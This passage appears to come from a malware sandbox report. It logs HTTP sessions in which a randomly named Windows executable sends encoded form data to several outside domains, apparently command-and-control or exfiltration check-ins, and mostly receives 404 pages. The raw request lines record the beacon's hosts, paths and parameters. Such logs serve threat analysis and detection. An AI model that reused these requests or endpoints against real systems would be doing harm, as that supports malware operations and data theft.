4e 7a 62 4d 5a 58 74 57 64 73 48 72 6a 69 41 49 67 42 7a 63 64 6c 63 55 31 4a 4c 44 50 54 38 79 51 67 4f 33 34 70 46 45 6b 33 48 43 42 69 50 4d 7a 56 66 51 [TRUNCATED]
Data Ascii: DrelH=[TRUNCATED]
Oct 22, 2024 22:58:36.032452106 CEST | 533 | IN | HTTP/1.1 404 Not Found
Date: Tue, 22 Oct 2024 20:58:35 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 53235 | 209.74.64.187 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:58:37.891360998 CEST | 481 | OUT | GET /qxse/?DrelH=rpts+huSPQ+pmLEcaktqX4OYLAiBGOxJ0LqkryefQtnAbXwhGMtouJAJNGxD75BBoIrDH5z7ykmTX7GRRg85P9Ge9YW+EOCG2iwxhwrHmW9o/3mDrh1ZK5nR7QXShQvwtw==&Sx=gnM4ZH HTTP/1.1
Host: www.jagdud.store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 22, 2024 22:58:38.597204924 CEST | 548 | IN | HTTP/1.1 404 Not Found
Date: Tue, 22 Oct 2024 20:58:38 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 53236 | 65.21.196.90 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:58:43.759345055 CEST | 747 | OUT | POST /y045/ HTTP/1.1
Host: www.030002837.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.030002837.xyz
Referer: http://www.030002837.xyz/y045/
Content-Length: 206
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 2f 33 70 69 34 56 64 6f 44 39 37 32 49 67 2b 59 66 70 50 4c 63 53 65 59 78 44 48 35 41 55 30 32 6d 76 38 44 4d 66 49 4b 6c 6b 59 67 37 34 70 75 44 47 48 58 52 58 45 43 53 76 72 4a 36 35 41 4e 42 73 47 58 32 6b 66 33 2f 48 2f 41 4a 4a 6b 63 64 31 52 4d 64 6b 32 30 6d 42 35 66 6b 45 6f 5a 44 2f 63 71 66 74 62 43 67 31 64 72 67 6a 47 36 77 4d 6c 7a 6e 68 39 6b 4f 79 50 79 38 61 71 5a 33 57 42 32 6a 50 2f 2f 6c 32 48 2f 64 58 38 6c 64 78 68 45 75 43 61 55 69 58 33 43 33 54 31 4d 33 70 64 77 32 78 4e 56 66 5a 4c 54 34 75 5a 78 34 6f 58 73 6d 4d 67 37 73 63 74 67 4c 42 31 44 51 66 47 58 4f 63 6f 3d
                                                                                                                                  Data Ascii: DrelH=/3pi4VdoD972Ig+YfpPLcSeYxDH5AU02mv8DMfIKlkYg74puDGHXRXECSvrJ65ANBsGX2kf3/H/AJJkcd1RMdk20mB5fkEoZD/cqftbCg1drgjG6wMlznh9kOyPy8aqZ3WB2jP//l2H/dX8ldxhEuCaUiX3C3T1M3pdw2xNVfZLT4uZx4oXsmMg7sctgLB1DQfGXOco=
Oct 22, 2024 22:58:44.613185883 CEST | 1032 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Tue, 22 Oct 2024 20:58:44 GMT
vary: User-Agent
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 53237 | 65.21.196.90 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:58:46.295634031 CEST | 767 | OUT | POST /y045/ HTTP/1.1
Host: www.030002837.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.030002837.xyz
Referer: http://www.030002837.xyz/y045/
Content-Length: 226
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 2f 33 70 69 34 56 64 6f 44 39 37 32 4b 42 75 59 61 4f 6a 4c 4e 69 65 58 30 44 48 35 58 45 30 79 6d 76 77 44 4d 65 39 56 6c 57 4d 67 37 5a 5a 75 43 43 54 58 43 6e 45 43 48 66 72 4d 30 5a 41 38 42 73 62 69 32 6d 62 33 2f 47 62 41 4a 4d 41 63 64 43 46 4e 62 30 32 4d 71 68 35 64 37 55 6f 5a 44 2f 63 71 66 70 37 6f 67 31 56 72 67 54 32 36 78 74 6c 30 6b 68 39 72 65 69 50 79 34 61 72 78 33 57 42 55 6a 4f 6a 42 6c 79 33 2f 64 57 4d 6c 64 41 68 4c 6b 43 62 66 6d 58 33 4d 34 53 63 4c 70 37 68 42 39 68 55 6a 4c 5a 58 76 30 34 30 62 69 4b 66 45 31 73 4d 44 38 50 6c 58 61 78 55 71 4b 38 57 6e 51 4c 2f 65 41 55 77 2f 77 7a 74 62 41 34 55 47 4f 35 4c 6d 32 38 58 46
                                                                                                                                  Data Ascii: DrelH=/3pi4VdoD972KBuYaOjLNieX0DH5XE0ymvwDMe9VlWMg7ZZuCCTXCnECHfrM0ZA8Bsbi2mb3/GbAJMAcdCFNb02Mqh5d7UoZD/cqfp7og1VrgT26xtl0kh9reiPy4arx3WBUjOjBly3/dWMldAhLkCbfmX3M4ScLp7hB9hUjLZXv040biKfE1sMD8PlXaxUqK8WnQL/eAUw/wztbA4UGO5Lm28XF
Oct 22, 2024 22:58:47.160942078 CEST | 1032 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Tue, 22 Oct 2024 20:58:46 GMT
vary: User-Agent
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 53238 | 65.21.196.90 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:58:48.842725992 CEST | 1784 | OUT | POST /y045/ HTTP/1.1
Host: www.030002837.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.030002837.xyz
Referer: http://www.030002837.xyz/y045/
Content-Length: 1242
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 2f 33 70 69 34 56 64 6f 44 39 37 32 4b 42 75 59 61 4f 6a 4c 4e 69 65 58 30 44 48 35 58 45 30 79 6d 76 77 44 4d 65 39 56 6c 57 55 67 37 72 52 75 44 6c 76 58 42 6e 45 43 62 50 72 4e 30 5a 41 68 42 73 44 6d 32 6d 48 4e 2f 46 7a 41 49 71 63 63 62 32 70 4e 53 30 32 4d 33 52 35 51 6b 45 6f 4d 44 37 77 75 66 74 58 6f 67 31 56 72 67 52 65 36 32 38 6c 30 69 68 39 6b 4f 79 50 75 38 61 72 4b 33 57 70 75 6a 4f 33 52 6c 42 2f 2f 64 32 63 6c 4f 53 5a 4c 73 43 62 64 6f 33 32 4b 34 53 41 45 70 2f 41 34 39 69 49 4a 4c 62 58 76 77 65 4e 41 77 34 48 6a 76 65 55 66 2f 63 63 36 4d 46 6b 39 4a 63 48 55 58 4a 44 42 44 6e 6b 53 2b 58 78 41 47 71 5a 2f 56 63 58 44 36 34 43 55 62 51 75 4f 36 2b 6e 74 4d 66 42 46 74 56 49 53 54 62 31 6c 5a 53 67 41 6e 6a 48 68 76 49 4e 56 4e 6f 41 32 49 58 45 4c 37 73 6a 46 74 74 74 50 51 36 4a 71 42 79 61 4d 7a 6d 63 46 4a 37 70 4c 41 6e 69 43 75 59 4b 47 79 79 49 45 4c 78 67 42 35 4a 46 6e 75 31 48 51 79 32 69 5a 74 4a 4d 44 70 63 71 71 4e 35 71 79 4f 4f 42 54 2b 77 76 65 [TRUNCATED]
                                                                                                                                   Data Ascii: DrelH=[TRUNCATED]
                                                                                                                                   Oct 22, 2024 22:58:49.733653069 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Connection: close
                                                                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                  pragma: no-cache
                                                                                                                                  content-type: text/html
                                                                                                                                  content-length: 796
                                                                                                                                  date: Tue, 22 Oct 2024 20:58:49 GMT
                                                                                                                                  vary: User-Agent
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   36 | 192.168.2.5 | 53239 | 65.21.196.90 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:58:51.385710001 CEST | 482 | OUT | GET /y045/?Sx=gnM4ZH&DrelH=y1BC7gE5U9SjKVi4f+qVAHSx2lLKNXVMs/YJXs1dmV0xz4NUECnrQCoTHq2W+qQeH7vV4kPmjQT4fdprdSopc2q7pRx51jA4E/xrfKHMwg9y+RaF/+hNtwtULy/7l6WTkA== HTTP/1.1
                                                                                                                                  Host: www.030002837.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                   Oct 22, 2024 22:58:52.236119032 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Connection: close
                                                                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                  pragma: no-cache
                                                                                                                                  content-type: text/html
                                                                                                                                  content-length: 796
                                                                                                                                  date: Tue, 22 Oct 2024 20:58:52 GMT
                                                                                                                                  vary: User-Agent
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   37 | 192.168.2.5 | 53240 | 3.33.130.190 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:58:57.521073103 CEST | 750 | OUT | POST /m7sk/ HTTP/1.1
                                                                                                                                  Host: www.ethetf.digital
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.ethetf.digital
                                                                                                                                  Referer: http://www.ethetf.digital/m7sk/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 4e 34 59 6a 6e 62 65 42 73 61 49 43 5a 43 46 58 4d 6a 73 32 57 51 4e 43 2b 75 44 73 50 65 69 43 48 39 66 59 37 4b 74 77 64 2b 57 53 37 2f 70 2b 32 45 30 6e 4a 6e 77 50 6d 72 36 2b 78 57 59 73 34 69 58 5a 6f 46 71 36 6c 5a 44 6f 57 79 2f 61 56 4f 37 59 6c 66 6e 77 2b 64 4d 4c 75 31 6c 4e 6f 4e 34 46 47 63 4b 31 70 4b 64 66 6c 4c 33 78 4a 4b 4b 30 58 6f 74 32 56 37 76 49 78 75 69 59 4b 49 78 74 5a 65 70 72 75 59 59 37 2b 2b 61 34 2b 78 47 41 73 57 55 56 43 4c 36 53 72 4c 75 68 6d 63 4b 46 66 6d 59 6f 32 49 64 6f 6a 45 72 36 35 78 47 58 7a 51 70 64 2b 79 44 74 58 50 2b 2f 37 56 41 74 62 67 77 3d
                                                                                                                                  Data Ascii: DrelH=N4YjnbeBsaICZCFXMjs2WQNC+uDsPeiCH9fY7Ktwd+WS7/p+2E0nJnwPmr6+xWYs4iXZoFq6lZDoWy/aVO7Ylfnw+dMLu1lNoN4FGcK1pKdflL3xJKK0Xot2V7vIxuiYKIxtZepruYY7++a4+xGAsWUVCL6SrLuhmcKFfmYo2IdojEr65xGXzQpd+yDtXP+/7VAtbgw=


                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   38 | 192.168.2.5 | 53241 | 3.33.130.190 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:59:00.095892906 CEST | 770 | OUT | POST /m7sk/ HTTP/1.1
                                                                                                                                  Host: www.ethetf.digital
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.ethetf.digital
                                                                                                                                  Referer: http://www.ethetf.digital/m7sk/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
